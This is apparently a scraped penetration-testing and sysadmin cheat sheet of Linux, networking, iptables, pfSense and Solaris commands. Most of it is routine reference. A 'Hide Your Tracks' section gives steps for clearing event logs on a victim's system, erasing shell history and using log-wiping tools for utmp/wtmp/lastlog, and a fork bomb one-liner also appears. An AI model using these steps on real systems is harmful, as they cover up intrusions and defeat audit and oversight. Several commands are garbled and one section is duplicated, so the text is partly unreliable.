62 | 63 | General networking concepts that will help you in troubleshooting networks on Linux [[26]](http://linux-training.be/linuxnet.pdf). 64 | 65 | $ watch ss -tp # Network connections 66 | $ netstat -ant # Tcp connections -anu=udp 67 | $ netstat -tulpn # Connections with PIDs 68 | $ lsof -i # Established connections 69 | $ smb:// ip /share # Access windows smb share 70 | $ share user x.x.x.x c$ # Mount Windows share 71 | $ smbclient -0 user\\\\ ip \\ share # SMB connect 72 | $ ifconfig eth# ip / cidr # Set IP and netmask 73 | $ ifconfig ethO:l ip / cidr # Set virtual interface 74 | $ route add default gw gw_ip # Set GW 75 | $ ifconfig eth# mtu [size] # Change MTU size 76 | $ export MAC=xx: xx: xx: xx: xx: xx # Change MAC 77 | $ ifconfig int hw ether MAC # Change MAC 78 | $ macchanger -m MAC int # Backtrack MAC changer 79 | $ iwlist int scan # Built-in wifi scanner 80 | $ dig -x ip # Domain lookup for IP 81 | $ host ip # Domain lookup for IP 82 | $ host -t SRV _ service _tcp.url.com # Domain SRV lookup 83 | $ dig @ ip domain -t AXFR # DNS Zone Xfer 84 | $ host -l domain namesvr # DNS Zone Xfer 85 | $ ip xfrm state list # Print existing VPN keys 86 | $ ip addr add ip / cidr dev ethO # Adds 'hidden' interface 87 | $ /var/log/messages | grep DHCP # List DHCP assignments 88 | $ tcpkill host ip and port port # Block ip:port 89 | $ echo "1" /proc/sys/net/ipv4/ip_forward # Turn on IP Forwarding 90 | $ echo "nameserver x.x.x.x" /etc/resolv.conf # Add DNS Server 91 | 92 | Linux System Info 93 | ----------------- 94 | 95 | Most common commands used to check information and configuration details about various hardware peripherals and devices.[[34]] 96 | 97 | $ lscpu # Reports information abut cpu and processing units 98 | $ lshw # List hardware 99 | $ hwinfo # Hardware information 100 | $ lspci # List PCI 101 | $ lsscsi # List scsi devices 102 | $ lsusb # List usb buses and device details 103 | $ inxi # Bash script that fetches hardware details 104 | $ lsblk # List block devices 105 | $ df # Disk space of file systems 106 | $ pydf # Python df 107 | $ fdisk # Utility to modify partitions on hard drives 108 | $ mount # Used to mount/unmount and view mounted file systems 109 | $ free # Check RAM 110 | $ dmidecode # Extracts hardware information by reading data from the SMBIOS data structures 111 | $ /proc files # Virtual files in /proc directory contain information about hardware and configurations 112 | $ hdparm # Gets information about sata devices 113 | 114 | [34]: 115 | 116 | Linux Misc Commands 117 | ------------------- 118 | 119 | Search commands[[25]] 120 | 121 | $ find -type f | xargs ls -l | cut -c 33- | sort -n # Search for files - sort by filesize (add -r for reverse order) 122 | $ find -atime +32 -exec mv {} /var/archive/logs \; # Move files that are over 1 month old 123 | RPM commands 124 | 125 | $ rpm -q -a # List all installed packages 126 | $ rpm -U -v *.rpm # Upgrade packages 127 | $ rpm -Fvh *.rpm # Freshen packages This is the one you should use when applying the latest fixes 128 | $ for i in `cat `; do if rpm -qpl $i | grep libX >/dev/null; then echo $i; fi; done # To find which rpm file (not installed) has the file libX 129 | 130 | Debian commands 131 | 132 | $ apt-cache search # Search for package 133 | $ sudo apt-get install # Install package from repository 134 | $ sudo dpkg --install # Install package from localfile 135 | $ sudo apt-get update # Update package listsfrom repositories 136 | $ sudo apt-get -u upgrade # Upgrade installed packages to latest version 137 | 138 | Basic script functions 139 | 140 | $ for filename in * ; do echo > $filename; done # Basic script to perform something against a number of files 141 | 142 | Counting commands 143 | 144 | $ grep -v -e "^$" filename | wc -l # To count number of none empty lines in a file 145 | $ find . -name "*.p?" | xargs grep -v -e "^$" - | wc -l # To count number of source code lines (perl) 146 | 147 | [25]: 148 | 149 | Manipulating files 150 | ------------------ 151 | 152 | Most frequently used Linux Commands for manipulating files.[[35]] 153 | 154 | $ cp file1 file # Copies the contents of file1 into file2. If file2 does not exist, it is created 155 | $ cp -i file1 file2 # If file2 exists, the user is prompted before it is overwritten with the contents of file1 156 | $ mv file1 file2 # If file2 does not exist, then file1 is renamed file2. If file2 exists, its contents are replaced with the contents of file1 157 | $ rm file1 file2 # Deletes file1 and file2 158 | $ mkdir directory # Create directories 159 | [35]: 160 | 161 | Linux Misc Commands 162 | ------------------- 163 | 164 | Search commands[[25]] 165 | 166 | $ find -type f | xargs ls -l | cut -c 33- | sort -n # Search for files - sort by filesize (add -r for reverse order) 167 | $ find -atime +32 -exec mv {} /var/archive/logs \; # Move files that are over 1 month old 168 | RPM commands 169 | 170 | $ rpm -q -a # List all installed packages 171 | $ rpm -U -v *.rpm # Upgrade packages 172 | $ rpm -Fvh *.rpm # Freshen packages This is the one you should use when applying the latest fixes 173 | $ for i in `cat `; do if rpm -qpl $i | grep libX >/dev/null; then echo $i; fi; done # To find which rpm file (not installed) has the file libX 174 | 175 | Debian commands 176 | 177 | $ apt-cache search # Search for package 178 | $ sudo apt-get install # Install package from repository 179 | $ sudo dpkg --install # Install package from localfile 180 | $ sudo apt-get update # Update package listsfrom repositories 181 | $ sudo apt-get -u upgrade # Upgrade installed packages to latest version 182 | 183 | Basic script functions 184 | 185 | $ for filename in * ; do echo > $filename; done # Basic script to perform something against a number of files 186 | 187 | Counting commands 188 | 189 | $ grep -v -e "^$" filename | wc -l # To count number of none empty lines in a file 190 | $ find . -name "*.p?" | xargs grep -v -e "^$" - | wc -l # To count number of source code lines (perl) 191 | 192 | [25]: 193 | 194 | Hide Your Tracks 195 | --------------------- 196 | 197 | ### Meterpreter [[11]] 198 | 199 | $ clearev # Clear all event logs (Application, System, Security) 200 | ### Windows machines 201 | 202 | - Download [clearlogs.exe] 203 | - Run: clearlogs.exe -sec 204 | NOTICE: You will need physical access to the victims system 205 | 206 | ### Linux systems 207 | 208 | $ kwrite /var/log/messages # Delete all or specific entries 209 | NOTICE: You can use any other text editor 210 | 211 | ### Erasing the Command History 212 | 213 | $ more ~/.bash_history # Command history 214 | $ echo $HISTSIZE # The size of our history file 215 | $ export HISTSIZE=0 # Set the histoty file size to zero 216 | 217 | ### Shredding the History File 218 | 219 | $ shred -zu root/.bash_history # The shred command with the -zu switches will overwrite the history with zeros and delete the file. 220 | 221 | ### The logs [[12]] 222 | 223 | $ WTMP # Every log on/off, with login/logout time plus tty and host 224 | $ UTMP # Who is online at the moment 225 | $ LASTLOG # Where did the logins come from 226 | ### Location of logs 227 | 228 | - UTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log 229 | - WTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log 230 | - LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log 231 | 232 | NOTICE: The location depends on UNIX distribution 233 | 234 | ### Shell History 235 | 236 | $ mv .logout save.1 237 | $ echo rm .history>.logout 238 | $ echo rm .logout>>.logout 239 | $ echo mv save.1 .logout>>.logout 240 | # Delete .history 241 | 242 | ### Log modifier programs 243 | 244 | $ ah-1_0b.tar # Changes the entries of accounting information 245 | $ clear.c # Deletes entries in utmp, wtmp, lastlog and wtmpx 246 | $ cloak2.c # Changes the entries in utmp, wtmp and lastlog 247 | $ invisible.c # Overwrites utmp, wtmp and lastlog with predefines values 248 | $ marryv11.c # Edit utmp, wtmp, lastlog and accounting data 249 | $ wzap.c # Deletes entries in wtmp 250 | $ wtmped.c # Deletes entries in wtmp 251 | $ zap.c # Overwrites utmp, wtmp, lastlog - Don't use! Can be detected! 252 | NOTICE: Never delete the logs 253 | 254 | [11]: 255 | 256 | 257 | [clearlogs.exe]: 258 | [12]: 259 | 260 | Linux scripting 261 | --------------- 262 | 263 | ### Understanding bash scripting [[27]] 264 | 265 | ### Ping sweep without NMAP [[28]] 266 | 267 | $ for i in `seq 1 255`; do ping -c 1 10.10.10.$i | tr \\n ' ' | awk '/1 received/ {print $2}'; done 268 | $ for i in {1..254}; do ping -c 1 -W 1 10.1.1.$i | grep 'from'; done 269 | 270 | ### Fork bomb [[29]] 271 | 272 | $ :(){ :|:& };: # forkbomb(){ forkbomb | forkbomb & }; forkbomb 273 | 274 | ### Monitor DNS [[30]] 275 | -It takes the IP address or hostname of the DNS server to check. Checks the records defined in the array. 276 | 277 | //Define defaults 278 | if($_SERVER[argv][1]) 279 | { 280 | $ns_server = $_SERVER[argv][1]; 281 | } else { 282 | echo "You need to supply a DNS server to check. Quitting.\n"; 283 | exit; 284 | } 285 | $hosts = array("zabbix.com" => "85.113.250.92", 286 | "php.net" => "69.147.83.197"); 287 | // Do query 288 | foreach($hosts as $host => $ip) 289 | { 290 | $result = shell_exec("dig +time=1 +tries=1 +short @".$ns_server." ".$host); 291 | if(!preg_match('/'.$ip.'/', $result)) 292 | { 293 | $failed = TRUE; 294 | } 295 | } 296 | if($failed) 297 | { 298 | echo "0\n"; 299 | } else { 300 | echo "1\n"; 301 | } 302 | ?> 303 | 304 | ### Monitoring NTP [[31]] 305 | 306 | #!/usr/local/bin/bash 307 | #ntptest 308 | #NTP test scripts for Zabbix monitor. Conditional return 309 | # of 1=success | 0= for failed response 310 | HOST_QUERY=$1 311 | if [`ntpq -pn $HOST_QUERY | grep -E -c '^\*'` -eq 1 ]; then 312 | #Sync responded, OK 313 | echo "1" 314 | else 315 | echo "0" 316 | fi 317 | 318 | NOTICE: Works with *nix Zabbix Server 319 | 320 | ### Special shell variables to be aware [[32]] 321 | 322 | $ $* # Passes in all of the arguments. This is useful for FOR loops 323 | $ $? # Gets the error code (exit()) status) of the last program executed 324 | $ $$ # Gets the PID of the current shell. 325 | $ $! # Gets the PID of the last background process 326 | $ $EUID # Gets the effective UID number of the scripts execution 327 | 328 | ### Linux Iptables Firewall Shell Script For Standalone Server [[33]] 329 | 330 | #!/bin/bash 331 | # A Linux Shell Script with common rules for IPTABLES Firewall. 332 | # By default this script only open port 80, 22, 53 (input) 333 | # All outgoing traffic is allowed (default - output) 334 | # ------------------------------------------------------------------------- 335 | # Copyright (c) 2004 nixCraft project 336 | # This script is licensed under GNU GPL version 2.0 or above 337 | # ------------------------------------------------------------------------- 338 | # This script is part of nixCraft shell script collection (NSSC) 339 | # Visit http://bash.cyberciti.biz/ for more information. 340 | # ------------------------------------------------------------------------- 341 | IPT="/sbin/iptables" 342 | SPAMLIST="blockedip" 343 | SPAMDROPMSG="BLOCKED IP DROP" 344 | echo "Starting IPv4 Wall..." 345 | $IPT -F 346 | $IPT -X 347 | $IPT -t nat -F 348 | $IPT -t nat -X 349 | $IPT -t mangle -F 350 | $IPT -t mangle -X 351 | modprobe ip_conntrack 352 | [ -f /root/scripts/blocked.ips.txt ] && BADIPS=$(egrep -v -E "^#|^$" /root/scripts/blocked.ips.txt) 353 | PUB_IF="eth0" 354 | #unlimited 355 | $IPT -A INPUT -i lo -j ACCEPT 356 | $IPT -A OUTPUT -o lo -j ACCEPT 357 | # DROP all incomming traffic 358 | $IPT -P INPUT DROP 359 | $IPT -P OUTPUT DROP 360 | $IPT -P FORWARD DROP 361 | if [ -f /root/scripts/blocked.ips.txt ]; 362 | then 363 | # create a new iptables list 364 | $IPT -N $SPAMLIST 365 | for ipblock in $BADIPS 366 | do 367 | $IPT -A $SPAMLIST -s $ipblock -j LOG --log-prefix "$SPAMDROPMSG" 368 | $IPT -A $SPAMLIST -s $ipblock -j DROP 369 | done 370 | $IPT -I INPUT -j $SPAMLIST 371 | $IPT -I OUTPUT -j $SPAMLIST 372 | $IPT -I FORWARD -j $SPAMLIST 373 | fi 374 | # Block sync 375 | $IPT -A INPUT -i ${PUB_IF} -p tcp ! --syn -m state --state NEW -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "Drop Sync" 376 | $IPT -A INPUT -i ${PUB_IF} -p tcp ! --syn -m state --state NEW -j DROP 377 | # Block Fragments 378 | $IPT -A INPUT -i ${PUB_IF} -f -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "Fragments Packets" 379 | $IPT -A INPUT -i ${PUB_IF} -f -j DROP 380 | # Block bad stuff 381 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP 382 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL ALL -j DROP 383 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL NONE -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "NULL Packets" 384 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL NONE -j DROP # NULL packets 385 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags SYN,RST SYN,RST -j DROP 386 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags SYN,FIN SYN,FIN -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "XMAS Packets" 387 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP #XMAS 388 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags FIN,ACK FIN -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "Fin Packets Scan" 389 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags FIN,ACK FIN -j DROP # FIN packet scans 390 | $IPT -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP 391 | # Allow full outgoing connection but no incomming stuff 392 | $IPT -A INPUT -i eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT 393 | $IPT -A OUTPUT -o eth0 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT 394 | # Allow ssh 395 | $IPT -A INPUT -p tcp --destination-port 22 -j ACCEPT 396 | # allow incomming ICMP ping pong stuff 397 | $IPT -A INPUT -p icmp --icmp-type 8 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT 398 | $IPT -A OUTPUT -p icmp --icmp-type 0 -m state --state ESTABLISHED,RELATED -j ACCEPT 399 | # Allow port 53 tcp/udp (DNS Server) 400 | $IPT -A INPUT -p udp --dport 53 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT 401 | $IPT -A OUTPUT -p udp --sport 53 -m state --state ESTABLISHED,RELATED -j ACCEPT 402 | $IPT -A INPUT -p tcp --destination-port 53 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT 403 | $IPT -A OUTPUT -p tcp --sport 53 -m state --state ESTABLISHED,RELATED -j ACCEPT 404 | # Open port 80 405 | $IPT -A INPUT -p tcp --destination-port 80 -j ACCEPT 406 | ##### Add your rules below ###### 407 | ##### END your rules ############ 408 | # Do not log smb/windows sharing packets - too much logging 409 | $IPT -A INPUT -p tcp -i eth0 --dport 137:139 -j REJECT 410 | $IPT -A INPUT -p udp -i eth0 --dport 137:139 -j REJECT 411 | # log everything else and drop 412 | $IPT -A INPUT -j LOG 413 | $IPT -A FORWARD -j LOG 414 | $IPT -A INPUT -j DROP 415 | exit 0 416 | [27]: 417 | [28]: 418 | [29]: 419 | [30]: 420 | [31]: 421 | [32]: 422 | [33]: 423 | 424 | IP Tables 425 | --------- 426 | 427 | ### Create a set named geoset[[13]] 428 | 429 | $ sudo ipset create geoblock hash:net,port 430 | 431 | ### Loop that runs banning list of countries from reaching the service of SSHD 432 | 433 | for IP in $(wget -O – http://www.ipdeny.com/ipblocks/data/countries/{cn,ru,kr,pk,tw,sg,hk}.zone) 434 | do 435 | # regular ban - block port 22 for countryXX 436 | sudo ipset add geoblock $IP,22 437 | done 438 | 439 | ### Preview of the list 440 | 441 | # sudo ipset list geoblock 442 | ### Delete whole list 443 | 444 | # sudo ipset del geoblock|"setname" 445 | 446 | ### Add rules to IPtables 447 | 448 | # sudo iptables -I INPUT -m set --set geoblock src -j DROP 449 | 450 | ### Save IPtables 451 | 452 | # service iptables save 453 | 454 | ### Reverse function 455 | 456 | # sudo iptables -A INPUT -m set --set !geoblock src -j DROP 457 | 458 | ### Connection States [[14]] 459 | 460 | #iptables -A INPUT -p tcp --dport ssh -s 10.10.10.10 -m state --state NEW,ESTABLISHED -j ACCEPT 461 | #iptables -A OUTPUT -p tcp --sport 22 -d 10.10.10.10 -m state --state ESTABLISHED -j ACCEPT 462 | 463 | ### Accept connections by default 464 | 465 | iptables --policy INPUT ACCEPT 466 | iptables --policy OUTPUT ACCEPT 467 | iptables --policy FORWARD ACCEPT 468 | 469 | ### Red Hat Linux firewall [[15]] 470 | 471 | ### IPtables Packet Flow Diagram [[16]] 472 | 473 | ![Iptables.gif](https://www.dropbox.com/s/5gwp8tk1q9hhnr4/Iptables.gif?dl=0&raw=1) 474 | 475 | [13]: 476 | [14]: 477 | [15]: 478 | [16]: 479 | 480 | Example 481 | ------- 482 | [[1]] 483 | 484 | tmpdir=${TMPDIR:-/tmp}/pssh.$$ 485 | mkdir -p $tmpdir 486 | count=0 487 | while IFS= read -r userhost; do 488 | ssh -n -o BatchMode=yes ${userhost} 'uname -a' > ${tmpdir}/${userhost} 2>&1 & 489 | count=`expr $count + 1` 490 | done < userhost.lst 491 | while [ $count -gt 0 ]; do 492 | wait $pids 493 | count=`expr $count - 1` 494 | done 495 | echo "Output for hosts are in $tmpdir" 496 | [1]: 497 | 498 | CHKCONFIG 499 | --------- 500 | 501 | The chkconfig utility is a command-line tool that allows you to specify in which runlevel to start a selected service, as well as to list all available services along with their current setting.[[3]] 502 | 503 | $ chkconfig --list # Listing the Services 504 | $ chkconfig --list service_name # Display the current settings for a selected service only 505 | $ chkconfig service_name on # Enabling a Service 506 | $ chkconfig service_name on --level runlevels # To enable a service in certain runlevels only 507 | $ chkconfig service_name off # Disabling a Service 508 | 509 | [3]: 510 | 511 | Kali Linux Commands 512 | ------------------- 513 | [[24]] 514 | 515 | $ apropos # Change access permissions 516 | $ chown # Change file owner and group 517 | $ chroot # Run a command with a different root directory 518 | $ chkconfig # System services (runlevel) 519 | $ cksum # Print CRC checksum and byte counts 520 | $ clear # Clear terminal screen 521 | $ cmp # Compare two files 522 | $ comm # Compare two sorted files line by line 523 | $ command # Run a command – ignoring shell functions 524 | $ continue # Resume the next iteration of a loop 525 | $ cp # Copy one or more files to another location 526 | $ cron # Daemon to execute scheduled commands 527 | $ crontab # Schedule a command to run at a later time 528 | $ csplit # Split a file into context-determined pieces 529 | $ cut # Divide a file into several parts 530 | $ date # Display or change the date and time 531 | $ dc # Desk Calculator 532 | $ dd # Convert and copy a file, write disk headers, boot records 533 | $ ddrescue # Data recovery tool 534 | $ declare # Declare variables and give them attributes 535 | $ df # Display free disk space 536 | $ diff # Display the differences between two files 537 | $ diff3 # Show differences among three files 538 | $ dig # DNS lookup 539 | $ dir # Briefly list directory contents 540 | $ dircolors # Colour setup for `ls’ 541 | $ dirname # Convert a full pathname to just a path 542 | $ dirs # Display list of remembered directories 543 | $ dmesg # Print kernel & driver messages 544 | $ du # Estimate file space usage 545 | $ echo # Display message on screen 546 | $ egrep # Search files for lines that match an extended expression 547 | $ eject # Eject removable media 548 | $ enable # Enable and disable builtin shell commands 549 | $ env # Environment variables 550 | $ ethtool # Ethernet card settings 551 | $ eval # Evaluate several commands/arguments 552 | $ exec # Execute a command 553 | $ exit # Exit the shell 554 | $ expect # Automate arbitrary applications accessed over a terminal 555 | $ expand # Convert tabs to spaces 556 | $ export # Set an environment variable 557 | $ expr # Evaluate expressions 558 | $ false # Do nothing, unsuccessfully 559 | $ fdformat # Low-level format a floppy disk 560 | $ fdisk # Partition table manipulator for Linux 561 | $ fg # Send job to foreground 562 | $ fgrep # Search files for lines that match a fixed string 563 | $ file # Determine file type 564 | $ find # Search for files that meet a desired criteria 565 | $ fmt # Reformat paragraph text 566 | $ fold # Wrap text to fit a specified width 567 | $ for # Expand words, and execute commands 568 | $ format # Format disks or tapes 569 | $ free # Display memory usage 570 | $ fsck # File system consistency check and repair 571 | $ ftp # File Transfer Protocol 572 | $ function # Define Function Macros 573 | $ fuser # Identify/kill the process that is accessing a file 574 | $ gawk # Find and Replace text within files 575 | $ getopts # Parse positional parameters 576 | $ grep # Search files for lines that match a given pattern 577 | $ groupadd # Add a user security group 578 | $ groupdel # Delete a group 579 | $ groupmod # Modify a group 580 | $ groups # Print group names a user is in 581 | $ gzip # Compress or decompress named files 582 | $ hash # Remember the full pathname of a name argument 583 | $ head # Output the first part of files 584 | $ help # Display help for a built-in command 585 | $ history # Command History 586 | $ hostname # Print or set system name 587 | $ iconv # Convert the character set of a file 588 | $ id # Print user and group id’s 589 | $ if # Conditionally perform a command 590 | $ ifconfig # Configure a network interface 591 | $ ifdown # Stop a network interface 592 | $ ifup # Start a network interface up 593 | $ import # Capture an X server screen and save the image to file 594 | $ install # Copy files and set attributes 595 | $ jobs # List active jobs 596 | $ join # Join lines on a common field 597 | $ kill # Stop a process from running 598 | $ killall # Kill processes by name 599 | $ less # Display output one screen at a time 600 | $ let # Perform arithmetic on shell variables 601 | $ ln # Create a symbolic link to a file 602 | $ local # Create variables 603 | $ locate # Find files 604 | $ logname # Print current login name 605 | $ logout # Exit a login shell 606 | $ look # Display lines beginning with a given string 607 | $ lpc # Line printer control program 608 | $ lpr # Off line print 609 | $ lprint # Print a file 610 | $ lprintd # Abort a print job 611 | $ lprintq # List the print queue 612 | $ lprm # Remove jobs from the print queue 613 | $ ls # List information about files 614 | $ lsof # List open files 615 | $ make # Recompile a group of programs 616 | $ man # Help manual 617 | $ mkdir # Create new folders 618 | $ mkfifo # Make FIFOs (named pipes) 619 | $ mkisofs # Create an hybrid ISO9660/JOLIET/HFS filesystem 620 | $ mknod # Make block or character special files 621 | $ more # Display output one screen at a time 622 | $ mount # Mount a file system 623 | $ mtools # Manipulate MS-DOS files 624 | $ mtr # Network diagnostics (traceroute/ping) 625 | $ mv # Move or rename files or directories 626 | $ mmv # Mass Move and rename files 627 | $ netstat # Networking information 628 | $ nice # Set the priority of a command or job 629 | $ nl # Number lines and write files 630 | $ nohup # Run a command immune to hangups 631 | $ notify-send # Send desktop notifications 632 | $ nslookup # Query Internet name servers interactively 633 | $ open # Open a file in its default application 634 | $ op # Operator access 635 | $ passwd # Modify a user password 636 | $ paste # Merge lines of files 637 | $ pathchk # Check file name portability 638 | $ ping # Test a network connection 639 | $ pkill # Stop processes from running 640 | $ popd # Restore the previous value of the current directory 641 | $ pr # Prepare files for printing 642 | $ printcap # Printer capability database 643 | $ printenv # Print environment variables 644 | $ printf # Format and print data 645 | $ ps # Process status 646 | $ pushd # Save and then change the current directory 647 | $ pwd # Print Working Directory 648 | $ quota # Display disk usage and limits 649 | $ quotacheck # Scan a file system for disk usage 650 | $ quotactl # Set disk quotas 651 | $ ram # ram disk device 652 | $ rcp # Copy files between two machines 653 | $ read # Read a line from standard input 654 | $ readarray # Read from stdin into an array variable 655 | $ readonly # Mark variables/functions as readonly 656 | $ reboot # Reboot the system 657 | $ rename # Rename files 658 | $ renice # Alter priority of running processes 659 | $ remsync # Synchronize remote files via email 660 | $ return # Exit a shell function 661 | $ rev # Reverse lines of a file 662 | $ rm # Remove files 663 | $ rmdir # Remove folders 664 | $ rsync # Remote file copy (Synchronize file trees) 665 | $ screen # Multiplex terminal, run remote shells via ssh 666 | $ scp # Secure copy (remote file copy) 667 | $ sdiff # Merge two files interactively 668 | $ sed # Stream Editor 669 | $ select # Accept keyboard input 670 | $ seq # Print numeric sequences 671 | $ set # Manipulate shell variables and functions 672 | $ sftp # Secure File Transfer Program 673 | $ shift # Shift positional parameters 674 | $ shopt # Shell Options 675 | $ shutdown # Shutdown or restart linux 676 | $ sleep # Delay for a specified time 677 | $ slocate # Find files 678 | $ sort # Sort text files 679 | $ source # Run commands from a file 680 | $ split # Split a file into fixed-size pieces 681 | $ ssh # Secure Shell client (remote login program) 682 | $ strace # Trace system calls and signals 683 | $ su # Substitute user identity 684 | $ sudo # Execute a command as another user 685 | $ sum # Print a checksum for a file 686 | $ suspend # Suspend execution of this shell 687 | $ symlink # Make a new name for a file 688 | $ sync # Synchronize data on disk with memory 689 | $ tail # Output the last part of file 690 | $ tar # Tape Archiver 691 | $ tee # Redirect output to multiple files 692 | $ test # Evaluate a conditional expression 693 | $ time # Measure Program running time 694 | $ times # User and system times 695 | $ touch # Change file timestamps 696 | $ top # List processes running on the system 697 | $ traceroute # Trace Route to Host 698 | $ trap # Run a command when a signal is set(bourne) 699 | $ tr # Translate, squeeze, and/or delete characters 700 | $ true # Do nothing, successfully 701 | $ tsort # Topological sort 702 | $ tty # Print filename of terminal on stdin 703 | $ type # Describe a command 704 | $ ulimit # Limit user resources 705 | $ umask # Users file creation mask 706 | $ umount # Unmount a device 707 | $ unalias # Remove an alias 708 | $ uname # Print system information 709 | $ unexpand # Convert spaces to tabs 710 | $ uniq # Uniquify files 711 | $ units # Convert units from one scale to another 712 | $ unset # Remove variable or function names 713 | $ unshar # Unpack shell archive scripts 714 | $ until # Execute commands (until error) 715 | $ uptime # Show uptime 716 | $ useradd # Create new user account 717 | $ usermod # Modify user account 718 | $ users # List users currently logged in 719 | $ uuencode # Encode a binary file 720 | $ uudecode # Decode a file created by uuencode 721 | $ v # Verbosely list directory contents (`ls -l -b’) 722 | $ vdir # Verbosely list directory contents (`ls -l -b’) 723 | $ vi # Text Editor 724 | $ vmstat # Report virtual memory statistics 725 | $ wait # Wait for a process to complete 726 | $ watch # Execute/display a program periodically 727 | $ wc # Print byte, word, and line counts 728 | $ whereis # Search the user’s $path, man pages and source files for a program 729 | $ which # Search the user’s $path for a program file 730 | $ while # Execute commands 731 | $ who # Print all usernames currently logged in 732 | $ whoami # Print the current user id and name (`id -un’) 733 | $ wget # Retrieve web pages or files via HTTP, HTTPS or FTP 734 | $ write # Send a message to another user 735 | $ xargs # Execute utility, passing constructed argument lists 736 | $ xdg-open # Open a file or URL in the user’s preferred application 737 | $ yes # Print a string until interrupted 738 | 739 | [24]: 740 | 741 | Using the PHP pfSense Shells 742 | --------------------------------- 743 | 744 | Using the PHP pfSense shell allows configuration of the config.xml file directly without needing to use the webConfigurator.[[49]] 745 | 746 | ### Options 747 | ![ii.png](https://www.dropbox.com/s/3mhvnw8v1eiql99/ii.png?dl=0&raw=1) 748 | 749 | ### pfSense Developer Shell 750 | 751 | print_r($config); # To output a configuration array 752 | print_r($config['interfaces']); # To output the interfaces configuration portion of config.xml 753 | print_r($config['dhcpd']); # To output the dhcp server configuration 754 | exit # To exit the developer shell 755 | print_r(get_wireless_modes(\"ath0\")); # To output supported wireless modes for an interface 756 | $config['system']['enablesshd'] = true; # To enable SSH 757 | $config['interfaces']['optx']['wireless']['standard'] = "11a"; # Change OPTX to the OPT interface name such as BACKHAUL 758 | $config['interfaces']['optx']['wireless']['mode'] = "hostap"; 759 | $config['interfaces']['optx']['wireless']['channel'] = "6"; 760 | $config['dhcpd']['optx']['enable'] = true; # To enable dhcp server for an optx interface 761 | $config['dhcpd']['optx']['range']['from'] = "192.168.31.100"; 762 | $config['dhcpd']['optx']['range']['to'] = "192.168.31.150"; 763 | $config['system']['disablefilter'] = true; # Disable the firewall filter 764 | $config['interfaces']['optx']['disabled'] = false; # Enable an interface and configure it as a DHCP client 765 | $config['interfaces']['optx']['ipaddr'] = "dhcp"; 766 | $config['interfaces']['wan']['enable'] = true; # Enable an interface and set a static IPv4 address 767 | $config['interfaces']['wan']['ipaddr'] = "192.168.100.1"; 768 | $config['interfaces']['wan']['subnet'] = "24"; 769 | write_config(); # Save out the new configuration (config.xml) 770 | system_reboot_sync(); # Reboot the system after saving 771 | 772 | [49]: 773 | 774 | Solaris 775 | ------- 776 | [[45]] 777 | 778 | ifconfig -a # List of interfaces 779 | netstat -in # List of interface 780 | ifconfig -r # Route listing 781 | ifconfig ethO dhcp # Start DHCP client 782 | ifconfig ethO plumb up ip netmask nmask # SET IP 783 | route add default ip # Set gateway 784 | logins -p # List users w/out passwords 785 | svcs -a # List all services w/ status 786 | prstat -a # Process listing (top) 787 | svcadm start ssh # Start SSH service 788 | inetadm -e telnet (-d for disable) # Enable telnet 789 | prtconf I grep Memory # Total physical memory 790 | iostat -En # Hard disk size 791 | showrev -c /usr/bin/bash # Information on a binary 792 | shutdown -i6 -gO -y # Restart system 793 | dfmounts # List clients connected NFS 794 | smc 795 | snoop -d int -c pkt # -o results.pcap # Packet capture 796 | /etc/vfstab # File system mount table 797 | /var/adm/logging # Login attempt log 798 | /etc/default/' # Default settings 799 | /etc/system # Kernel modules & config 800 | /var/adm/messages # Syslog location 801 | /etc/auto_' # Automounter config files 802 | /etc/inet/ipnodes # IPv4/IPv6 host file 803 | 804 | [45]: 805 | 806 | Windows Versions 807 | ---------------- 808 | [[55]] 809 | 810 | NT 3.1 # Windows NT 3.1 (All) 811 | NT 3.2 # Windows NT 3.5 (All) 812 | NT 3.51 # Windows NT 3.51 (All) 813 | NT 4.0 # Windows NT 4.0 (All) 814 | NT 5.0 # Windows 2000 (All) 815 | NT 5.1 # Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded) 816 | NT 5.2 # Windows XP (64-bit, Pro 64-bit), Windows Server 2003 & R2 (Standard, Enterprise), Windows Home Server 817 | NT 6.0 # Windows Vista (Starter, Home, Basic, Home Premium, Business, Enterprise, Ultimate), Windows Server 2008 (Foundation, Standard, Enterprise) 818 | NT 6.1 # Windows 7 (Starter, Home, Pro, Enterprise, Ultimate), Windows Server 2008 R2 (Foundation, Standard, Enterprise) 819 | NT 6.2 # Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM)), Windows Phone 8, Windows Server 2012 (Foundation, Essentials, Standard) 820 | NT 6.3 # Windows 8.1 (Pro, Enterprise), Windows Server 2012 R2 (Foundation, Essentials, Standard, Datacenter) 821 | NT 10.0 # Windows 10 (Home, Pro, Pro Education, Enterprise, Enterprise LTSB, Education, Mobile, Mobile Enterprise, IoT Core, IoT Enterprise, IoT Mobile Enterprise), Windows Server 2016 (Essentials, Standard, Datacenter) 822 | 823 | [55]: 824 | 825 | Startup Directories 826 | ------------------- 827 | [[46]] 828 | 829 | ### NT 6.1 830 | 831 | Personal Startup folder: 832 | 833 